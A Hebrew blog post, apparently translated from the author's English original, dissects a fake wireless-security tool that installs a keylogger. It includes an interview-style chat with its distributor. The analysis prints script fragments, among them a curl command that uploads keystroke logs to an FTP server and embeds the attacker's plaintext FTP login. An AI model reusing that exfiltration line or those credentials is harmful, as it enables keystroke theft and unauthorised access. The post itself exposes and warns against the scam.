ZuLL, יומנו של האקר.

הפוסט הזה הוא תרגום של פוסט שלי (http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/) שחשבתי שיכול להתאים לפרסום בבלוג של גיא מכיוון שקהל היעד שלו הוא בעיקר אנשים שמתעסקים בהאקינג, אבטחת מידע או איך-שלא-תקראו-לזה… מקווה שתהנו (ותסלחו לי על הניסוחים הכושלים – כאמור זה תרגום).

בשבוע שעבר יצא לי "לשחק" קצת עם כלים לבדיקת רמת ההגנה של רשתות אלחוטיות בעקבות בקשה של לקוח "להריץ כלים לא שגרתיים כמו שכולם מריצים" (למרות הסלידה שלי מדרישות לכלים ספציפיים ו/או לספק רשימת מכולת של "מה אתה הולך להריץ"… נחש מה? לא משנה במה אני משתמש, אתה יכול להיות בטוח שבאיזשהו שלב אני הולך להפתיע אותך…).

במסגרת החיפוש, ובעזרתם המקרית של טק-קראנץ', הגעתי לאתר הזה המתיימר להיות מוקדש לאבטחת רשתות אלחוטיות. אז אחרי שהתגברתי על הבחילה הקלה מהעיצוב המזעזע (וכן – מוזיקת רקע באתר זה כל כך 90'…) הורדתי את 4 הקבצים האמורים להוות את הכלי. איפה ההתלבטות בכלל כשה-FBI משתמש באותם כלים…

בדיקה מהירה – ויש לנו שלושה סקריפטים (לכאורה) וזיפ (איך מתרגמים tarball לעברית? כדורזפת? טארבול?). למה לכאורה? מכיוון שכשסקריפט שאמור להיות טקסטואלי מזוהה על ידי המערכת כקובץ ELF אתה יודע שמשהוא "מסריח" קורה כאן. וכך התחיל הסיפור שנתן לי להגיע לסוף השבוע מחוייך ומבודח (בד"כ אני סתם מותש).

אז הנה סיכום "מנהלים" למה שקורה באתר של החבר שלנו שה-FBI משתמשים לכאורה בכלים שלו:

1. הכלים שהוא מספק אינם כלי אבטחת מידע בכלל. בהתחלה עוד נתתי לו להנות מהספק – נו, עוד מישהו שארז כלים ידועים בסקריפט משלו לצרכי נוחות.אבל לא. אפילו karma לא היתה כלולה שם – למרות שהסקריפט הראשי נקרא כך, ולמעשה זו הפונקציונליות שהכלי אמור היה לספק.
2. מבט זריז בזיפ מראה שהוא מכיל בכלל keylogger שנגנב מכאן.
3. כשהסקריפט הראשי מופעל, שני סקריפטים נוספים מופעלים ברקע – האחד מקמפל את ה-keylogger ומריץ אותו, והשני דואג להעלות את תעוד ההקלדות ל-FTP כדי שהמתקיף יוכל לעקוב אחריך.
4. במקביל, הסקריפט הראשי במסגרת "ההתקנה" דורש ממך לשלוח אימייל לכותב הכלי על מנת לקבל קוד אקטיבציה, ובאופן מאד נוח פותח עבורך את פיירפוקס (שועל-אש? שואש?) עם שלושה טאבים לגימייל, יאהו, והוטמייל. לטענת הסקריפט לאחר שליחת האימייל אתה אמור לקבל קוד אקטיבציה חינם אוטומטית.

נחזור ל"כלים" שלנו. כאמור הסקריפטים הם לא סקריפטים. מה נהיה? פשוט – הם היו פעם סקריפטים, אבל כדי לטשטש את מה שבאמת נעשה, הם "קומפלו" לקבצים בינריים באמצעות shc. המרת הקבצים הבינריים חזרה לסקריפטים היתה פשוטה למדי (שעורי בית -–לקרוא את התעוד של shc ולשחק עם הקבצים בבית).

עכשיו כשקצת יותר ברור מול מה אנחנו עומדים, בואו נסתכל על חלק מהקוד של הסקריפטים ומה עומד מאחוריהם. אפילו אם אתם לא סקריפטולוגים מהוללים, די קל לעקוב אחרי הנעשה (ויש אפילו הערות בקוד!!!).

אוקיי, אז אנחנו רואים איך ה-keylogger מקומפל ומותקן, ושני הסקריפטים הנוספים bg1.sh ו-bg2.sh מורצים ברקע. בשלב הבא, אנו מגיעים ל"התקנה" בה הסקריפט הראשי (כאמור karma.sh) מבקש מהמשתמש לשלוח אימייל לצרכי אקטיבציה המכיל הצהרה כי השימוש בכלי איננו משמש לעבירה על החוק.

הזכרתי כי ההתקפה כאן מכוונת לאנשים שמתעסקים באבטחת מידע והאקינג, והנה הוכחה נוספת:

read -p “Which backtrack are you using ? (bt3=3,bt4=4) ” bt

נחמד… מוודאים איתנו באיזה גירסה של BackTrack אנחנו משתמשים. לזכות כותב הסקריפט ייאמר שאכן ההתנהגות של הסקריפט משתנה בהתאם לגירסת מ"ה עליה אנחנו רצים (שינויי קונפיגורצית רשת וכו').

בשלב הבא מוודאים שהדפדפן סגור, ופותחים עבורנו את שלושת אתרי הוובמייל:

firefox https://login.yahoo.com/ &
sleep 4

firefox https://www.google.com/accounts/ManageAccount &

sleep 4

firefox http://home.live.com/

המתקיף רוצה כמובן שנבצע כניסה מלאה לאימייל שלנו (עם ניחוש לא רע המכסה את ספקי האימייל העיקריים), כדי שנשלח את הבקשה לקוד האקטיבציה – וכל זאת כאמור כאשר ה-keylogger עובד במרץ ברקע ומקליט כל הקלדה שלנו ושולח אותה ל-FTP. בדיוק כאן רוב המשתמשים ייפלו…

השלב הבא בסקריפט – האקטיבציה עצמה. או שלא.

############################

# DECOY FOR ACTIVATION CODE

clear

echo “”

read -p “ENTER ROGUE AP ACTIVATION CODE : ” pls

sleep 3

echo “You have entered an invalid code ”

echo “”

exit

############################

יש להודות כי ההערות בגוף הסקריפט משעשעות – "פתיון" האקטיבציה די ברור כאן, ובמיוחד אהבתי את ההמתנה של שלוש השניות לפני שהמשתמש מיודע כי הקוד לא נכון. אפשר ממש להרגיש שהכלי עובד קשה כדי לוודא אותו ברקע. קלאסי!

זה פחות או יותר לשלב הניתוח הטכני של הקבצים המוצעים מהאתר. אבל לא הייתי טורח לכתוב את הפוסט הזה (ולתרגם אותו – שבינתיים לוקח לי יותר זמן מכתיבת הפוסט המקורי ), אלמלא הייתי נתקל בידידינו ההאקר המפורסם בצ'אט. אז האינטראקציה התחילה כשכתבתי אימייל על מנת לראות כיצד האקטיבציה קורה, ולאחר כיום קיבלתי תשובה (ממש "מענה אוטומטי"…):

Hi

1. We are preparing the activation code for you.

2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c fadzilmahfodh@yahoo.com ?

Cheers.

EMAIL VIA MY CELLPHONE FOR FAST RESPONSE

http://fadzilmahfodh.blogspot.com

אז לא רק שלא קיבלתי קוד אקטיבציה, הם "מכינים" אותו (מה זה אומר? הלכו לקטוף צמחים מיוחדים לקוד שלי?), אלא שאני מתבקש לתרום מעשר קל למסכן שעבד כל כך קשה על כתיבת כלי אבטחה משהו משהו ומעניק אותו בחינם לקהילה… אוקיי, אז עניתי בנימוס ש:

1. תודה – אני מחכה בכליון עיניים לקוד.

2. אני אשקול תרומה אולי אחרי שאנסה את הכלי.

ובמהרה קיבלתי מענה המציע לי לנסות כלי אחר (שבכלל לא קשור למה שהכלי המקורי אמור לעשות) בגרסת נסיון.

המממ, מעניין. למזלי השתמשתי בחשבון ספאמי של יאהו וכנראה שגם ידידינו… מי שלא מכיר, ביאהו אפשר לראות את הסטטוס של מי שאתה מתכתב אתו באימייל ולצ'וטט איתו דרך ממשק הווב אם הוא כרגע זמין! אז זה בדיוק מה שעשיתי…

—– Our chat on Wed, 7/7/10 2:53 PM —–

Iftach(2:34 PM): hey man

Iftach(2:34 PM): mind if a ask a couple of questions?

fadzilmahfodh(2:34 PM): okey

Iftach(2:35 PM): cool. I’m doing this research on security tools and their authors…

fadzilmahfodh(2:35 PM): okey

Iftach(2:35 PM): saw your tool and wanted to hear about how you got to write

it, how well is it distributed in the community etc…

Iftach(2:36 PM): does that activation thing a common practice with free tools?

fadzilmahfodh(2:36 PM): yes see, we need to maintain our website thus we need supporter

fadzilmahfodh(2:37 PM): everyday there are at least 500++ people asking for code

Iftach(2:37 PM): I see.

fadzilmahfodh(2:37 PM): i no longer able to provide for free

fadzilmahfodh(2:37 PM): too time consuming and i need to be compensated for my

time and effort

fadzilmahfodh(2:38 PM): hope you understand

המסכן צריך שיפצו אותו על ה"זמן והמאמץ". אוי-אוי-אוי (ותזכרו שכל המאמץ שלו מסתכם בסקריפט הונאה בלבד – הוא אפילו לא טרח לכלול איזשהו כלי לפריצת/ניתוח רשת אלחוטית שזמין באופן חופשי…)

Iftach(2:40 PM): now, about the tool – that’s a linux binary obviously (thought

it was a shell script at the beginning). Did you base it on something existing

or write yourself?

fadzilmahfodh(2:41 PM): i wrote it by my self then scramble the code

Iftach(2:41 PM): hence the activation i see…

fadzilmahfodh(2:42 PM): i can afford to give ‘free lunch’ to everybody. Hope

you understand

Iftach(2:43 PM): sure, i understand.

fadzilmahfodh(2:43 PM): So you interested in the software?

Iftach(2:44 PM): more from a research point of view – for an article I’m

writing

Iftach(2:44 PM): so, the installer you use, I see that it contains some

additional code that is being compiled on the client.

fadzilmahfodh(2:45 PM): Yes. The purpose is the code will be unique to user

hardware

Iftach(2:45 PM): and I saw that there were some FTP connections made? Is that

to verify that the client is a registered one?

fadzilmahfodh(2:46 PM): Well, that is another story…

Iftach(2:46 PM): I’m listening

fadzilmahfodh(2:46 PM): maybe some other time huh

Iftach(2:47 PM): OK. Last question – do you get a lot of account passwords

through that keylogger that sends the data to your FTP?

fadzilmahfodh(2:47 PM): sorry, no comment unless i am in court

בשלב הזה של "הראיון" שלנו, הבנתי שסיפור הכיסוי שלי הולך להיות יותר אמיתי ממה שחשבתי (ולהלן ה"מאמר" שאתם קוראים). אי אפשר להמציא שטויות כאלה, אז הייצי חייב לתעד את זה איכשהו…

Iftach(2:48 PM): aha, and it’s part of the installer because? just to make sure

people can send the activation email correctly?

Iftach(2:48 PM): Back to statistics, out of the average 500 ppl asking for

activation – how many passwords do you manage to grab?

fadzilmahfodh(2:49 PM): well, the ftp is to confirm that software match with

data in server

fadzilmahfodh(2:49 PM): if it does not match, it will fail to run

fadzilmahfodh(2:49 PM): or i can just change the data/activation code in the

server

fadzilmahfodh(2:49 PM): then everything will not run

Iftach(2:49 PM): and how does that relate to the keylogging?

fadzilmahfodh(2:50 PM): well, that i another story…

Iftach(2:51 PM): I mean – the keylogger data is sent to that FTP. Is that part

of the verification or is this a separate process?

Iftach(2:51 PM): So, on average, how many accounts you manage to get on that

FTP server per day?

fadzilmahfodh(2:51 PM): well, you do not even support my website and how the

hell am i going to tell you

Iftach(2:52 PM): Let’s just get it straight – I’m not going to “support” the

site… I’m just doing some research on security tools.

fadzilmahfodh(2:52 PM): bye

Iftach(2:53 PM): You are free to tell, or not if you don’t want to. But I’m

publishing the story as it is…

Iftach(2:53 PM): With your acknowledgment that you use a keylogger to steal your

site visitor passwords. Unless you want to be quoted otherwise in the story…

ונאמן להבטחתי לפדזיל (או איך שלא קוראים לחכמולוג שלנו), אני מפרסם את ה"ראיון" שלנו ללא שינויים משמעותיים.

אבל רגע – יש עוד! עוד? כן כן! הדובדבן על הקצפת היה בשלב ששכנעתע את עצמי להציק לידידינו רק עוד פעם אחת, ולנסות להיכנס ל-FTP שאליו הוא שולח את כל רישומי ההקלדות של המשתמשים שלו. הרי שם המשתמש והסיסמא היו באחד הסקריפטים (כאמור – "קימפול" שלהם לבינרי לא כל כך עובד עלינו…)

curl -s -k –ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt

ואז הגיע המסך שהשאיר לי חיוך שהספיק לכל הסופ"ש:

כמו שאומרים priceless.

אבל אתם יודעים מה? זה הכל באשמתנו! אם היינו "תורמים" לבחור כמו שהוא בטח מתחנן לכל מי ששולח לו אימייל, אז אולי היה לו מספיק כסף כדי לשלם עבור החשבון FTP שלו ב-drivehq, והיה יכול לעשות עוד כסך מלגנוב כסף נוסף מכל מי שנפל בהונאה שלו וקיבל keylogger במתנה.

גדול מהחיים. אבל ברצינות – מוסר השכל קצר (אחרת גיא לא היה מפרסם את זה עכשיו כששנינו מרצים רציניים בטכניון ) גם כלי סקיוריטי, במיוחד ממקומות לא מוכרים, זכאים לבדיקה קצרה. אני אולי קצת אולד-פשן אבל אם אני לא רואה את קוד המקור היום, אני הולך לדייק בקטנות. תסתכלו, תנטרו (רשת, זכרון, דיסק), ותבדקו שוב. לפעמים זה אפילו משתלם…

תגיות: Hacking, wireless, כללי